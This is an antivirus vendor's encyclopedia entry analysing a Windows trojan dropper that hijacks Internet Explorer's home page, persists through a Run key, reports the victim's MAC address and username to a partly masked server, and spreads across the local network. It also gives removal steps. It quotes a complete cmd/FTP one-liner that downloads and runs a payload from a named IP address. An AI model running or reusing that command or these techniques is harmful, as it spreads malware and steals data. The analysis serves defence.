English
The Internet threat alert status is currently normal. At present, no major epidemics or other serious incidents have been recorded by Kaspersky Lab’s monitoring service. Internet threat level: 1

Trojan-Dropper.Win32.StartPage.eba

Detected Jun 29 2011 09:10 GMT
Released Jun 29 2011 11:00 GMT
Published Oct 10 2011 07:30 GMT

Technical Details
Payload
Removal instructions

Technical Details

A trojan program that installs and launches other software on the infected computer without the user's knowledge. It is a Windows application (PE EXE-file). 25169 bytes. The program is packed by an unknown packer. Its unpacked size is around 74 kB. Written in C++.


Payload

If the path to the trojan file does not contain a sequence of "ommon" symbols, the trojan will retrieve a script from its body and will launch this script under the following name:

%ProgramFiles%\<rnd>.hta
(md5: D7444767D527E6E97BD3EB85D60E800D)
<rnd> is a sequence of three Latin symbols, for example, "YSQ".

This file is 803 bytes and is detected by Kaspersky Antivirus as Trojan.VBS.StartPage.hw.

The launch of this trojan script leads to a change in the default home page and search page for the Internet Explorer browser by adding the following information to the system registry key:

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "www.5***ling.com"
"Search Page" = "www.5***iling.com"
"default_page_url" = "www.5***ling.com"
and also ensures the automatic launch of a copy of the trojan every time the system is started:
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
"safe360" = "%ProgramFiles%\Common Files\sebsbvx\coiome.exe
The trojan then creates a copy of its file under the name "coiome.exe" and deletes its original file:
%ProgramFiles%\Common Files\sebsbvx\coiome.exe
The file also has its creation date set as "17.08.2009", and the directory in which the trojan copy is found is given the attributes "hidden" and "system":
%ProgramFiles%\Common Files\sebsbvx
When creating a copy of itself, the trojan may add a random sequence of symbols to the file so that the trojan copy hash files vary. The trojan may also add a sequence of "2" symbols to the file, thus increasing the size of its copy.

The trojan then launches its copy and shuts down.

The trojan downloads the file from the following URL:

http://j.q***800.com/b.jpg
and saves the downloaded file under the following name:
%WinDir%\Fonts\oh.ini
This file is a configuration file and is used further by the trojan. Using the system file:
%System%\sc.exe
it automatically launches services with the following names:
lanmanworkstation
lanmanserver
RpcLocator
Browser
NtLmSsp
LmHosts 
After this, it launches the above mentioned service using the system file:
%System%\net1.exe
The trojan then sends the request to the attacker's server in order to transfer the data about the infected computer in the following request:
http://tj.q***800.com/t/Count.asp?mac=<MAC-user's computer address>&ver=01&t=<name of computer user>
The following response came from the server when creating the description:
addok
To conceal its work online, it deletes the files from the following directories in a separate string:
%userprofile%\Cookies\*.*
%userprofile%\Local Settings\Temporary Internet Files\*.*
%userprofile%\Local Settings\Temp\Cookies\*.*
Before deleting, it removes the "read only", "hidden", "system", and "archive" attributes from the files.

It creates a directory named:

%AppData%\f.exe
It deletes information from the registry about the service called:
JavaServe
It deletes the following files:
%ProgramFiles%\Internet Explorer\usp10.dll
%WinDir%\ModFan\mone.dll
%WinDir%\UoDo\game.dll
The trojan retrieves the following file from its body:
%WinDir%\Tasks\<rnd2>i.vbe
<rnd2> is a sequence of 3random Latin symbols.

This file is 2117 bytes. The file is a subsidiary and is used for the trojan's further work.

It then removes the following file from its body:

%WinDir%\Tasks\<rnd3>e.exe
<rnd3> is a sequence of 3 random Latin letters, for example, "DNP".

This file is detected by Kaspersky Antivirus as Exploit.Win32.IMG-WMF.fk. In the extracted file, it enters the working time of the user's computer so that the hash files vary each time they are created. The trojan may also add a sequence of the "0" value to the file so that the file may be differentiated in size from 3748 bytes.

The trojan determines the IP-address of the user's computer and then reads and deciphers the previously retrieved configuration file named:

%WinDir%\Fonts\oh.ini
the trojan obtains one of the following parameters from this file which it will use to launch the file:
%WinDir%\Tasks\<rnd3>e.exe <parameter1> <parameter2>
<parameter1> - IP-address (the trojan lists the IP-addresses of the local network where the infected computer is located)
<parameter2> - deciphered URL, received from the configuration file.

The configuration file contained the following link when creating the description:

http://dh***88.org/p/mi.exe (32891 bytes, detected by Kaspersky Antivirus as Trojan-Downloader.Win32.Geral.adeh)
It then runs the following type of command:
%System%\cscript.exe %WinDir%\Tasks\<rnd2>i.vbe <IP-address of the attacked computer> administrator "" "cmd /c @echo open 61.129.51.245>>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get n.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del b.dat&n.exe&n.exe&del n.exe"
The trojan therefore tries to download and launch a file from the FTP-server named "n.exe" on the attacked computer. After a successful launch, it deletes this file.

It deletes the file before shutting down:

%ProgramFiles%\<rnd2>.hta


Removal instructions

If your computer has not been protected with anti-virus software and has been infected with malware, you will need to take the following actions to delete this:

  1. Delete the original trojan file (its location on the infected computer will depend on how the program got onto the computer).
  2. Using Task manager, end the trojan process: coiome.exe
  3. Delete the following files:
    %ProgramFiles%\<rnd>.hta
    %ProgramFiles%\Common Files\sebsbvx\coiome.exe
    %WinDir%\Fonts\oh.ini
    %WinDir%\Tasks\<rnd2>i.vbe
    %WinDir%\Tasks\<rnd3>e.exe
    
  4. Delete the following directory:
    %AppData%\f.exe
  5. Restore the changed parameter values for the system registry key (how to work with the registry?):
    [HKCU\Software\Microsoft\Internet Explorer\Main]
    "Start Page"
    "Search Page"
    "default_page_url"
    
  6. Delete the system registry key:
    [HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
    "safe360" = "%ProgramFiles%\Common Files\sebsbvx\coiome.exe
    
  7. Clear the Temporary Internet Files directory, containing the infected files (How to delete infected files in the Temporary Internet Files folder?):
    %Temporary Internet Files%
  8. Run a full Kaspersky Antivirus scan of the computer with updated antivirus databases (download trial version).


md5: 14210E624FCCF904799E90A589A4B975
sha1: 3EE389EA35C2264A6586C6A26E1635032C7D2FEB


Bookmark and Share
Share
Trojan-Dropper

Trojan-Dropper programs are designed to secretly install malicious programs built into their code to victim computers.

This type of malicious program usually save a range of files to the victim’s drive (usually to the Windows directory, the Windows system directory, temporary directory etc.), and launches them without any notification (or with fake notification of an archive error, an outdated operating system version, etc.).

Such programs are used by hackers to:

  • secretly install Trojan programs and/or viruses
  • protect known malicious programs from being detected by antivirus solutions; not all antivirus programs are capable of scanning all the components inside this type of Trojans.